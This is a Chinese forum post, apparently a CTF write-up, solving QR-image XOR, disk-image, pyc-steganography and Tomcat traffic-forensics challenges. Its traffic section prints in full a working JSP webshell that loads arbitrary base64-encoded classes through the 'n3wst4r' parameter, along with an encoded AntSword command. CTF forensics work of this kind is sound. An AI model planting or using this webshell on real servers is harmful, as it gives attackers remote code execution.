给出了两张图片,像是二维码,但是其中一张图片是损坏的,因此想到使用Stegsolve对两张图片进行异或:
异或得到一张新的二维码,扫描获得Flag:
拿到文件之后发现是硬盘格式文件
新建目录 挂载
flag在hint.png
pyc文件隐写很容易就能找到stegosaurus项目:https://github.com/AngelKitty/stegosaurus
需要注意的是这个项目对于环境要求比较离谱,尽量用Python3.6去运行
直接提取隐写数据即可:
python3 stegosaurus/stegosaurus.py -x flag.pyc
题目要求如下
首先过滤出POST方式的请求:
http.request.method == POST
发现有一个文件上传的请求:
上传了一个shell.war文件,这里应该可以看出来其实是tomcat弱口令部署war包GetShell的一个流量。
保存下来war包解压:
jar -xvf download.war
可以获得yesec.jsp:
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("n3wst4r");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
由此得到WebShell密码:n3wst4r
这个密码也可以从后续的请求包中得到:
对于蚁剑响应流量的解密就是Base64解密即可,需要去掉响应首尾拼接的干扰字符。
对于蚁剑请求流量的分析需要删掉首部前两个字符,例如在tcp.stream eq 39的请求中我们提取出参数:
f6f75679ab3efc=AvY2QgIi91c3IvbG9jYWwvdG9tY2F0IjtlbnY7ZWNobyBmNWNkOTtwd2Q7ZWNobyAwYTI1ZmJjMWM1
去掉参数值的前两位得到:
Y2QgIi91c3IvbG9jYWwvdG9tY2F0IjtlbnY7ZWNobyBmNWNkOTtwd2Q7ZWNobyAwYTI1ZmJjMWM1
Base64解码后得到:
更多内容已被隐藏
主题内容你需要付费可见 (点击购买) 售价:1 金币
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-魔方 | 100.00 | 0 | 2023-11-13 20:08:13 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
1.zip 文件大小:5.616M (下载次数:5)
© 2016 - 2024 掌控者 All Rights Reserved.
zzzazzz
发表于 2023-11-14
1
评论列表
加载数据中...
jacker778
发表于 2023-11-15
1
评论列表
加载数据中...
a63560171
发表于 11个月前
1
评论列表
加载数据中...
董柯岩
发表于 11个月前
1
评论列表
加载数据中...
asukaa
发表于 9个月前
1
评论列表
加载数据中...
asukaa
发表于 9个月前
1
评论列表
加载数据中...
fupanc
发表于 1个月前
瑞思拜
评论列表
加载数据中...